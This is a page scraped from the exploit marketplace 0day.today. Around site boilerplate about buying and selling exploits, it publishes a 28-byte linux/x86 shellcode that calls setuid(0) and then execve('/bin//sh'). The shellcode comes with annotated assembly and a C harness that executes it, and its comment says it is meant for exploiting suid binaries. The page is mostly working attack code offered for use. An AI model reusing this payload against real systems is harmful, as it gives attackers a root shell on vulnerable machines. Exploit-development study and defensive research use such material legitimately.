0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
linux/x86 setuid(0) + execve(/bin/sh) 28 bytes
============================================== linux/x86 setuid(0) + execve(/bin/sh) 28 bytes ============================================== /* * revenge-setuid.c, v1.0 2006/09/30 14:57 * * linux/x86 setuid(0) + execve("/bin//sh", ["/bin//sh"], NULL) shellcode * once again... * * [ setuid (6 bytes) + execve (22 bytes) = 28 bytes ] * [ ] * [ Same as revenge-execve.c we start the 2 system ] * [ calls with a mov resulting in 2 bytes less, but ] * [ this one is only for suid binary exploitation. ] * [ ] * * http://www.0xcafebabe.it * <revenge@0xcafebabe.it> * */ char sc[] = // <_start> "\xb0\x17" // mov $0x17,%al "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al "\x99" // cltd "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // push %ebx "\x89\xe1" // mov %esp,%ecx "\xcd\x80" // int $0x80 ; int main() { void (*fp)(void) = (void (*)(void))sc; printf("Length: %d\n",strlen(sc)); fp(); } # 0day.today [2024-07-05] #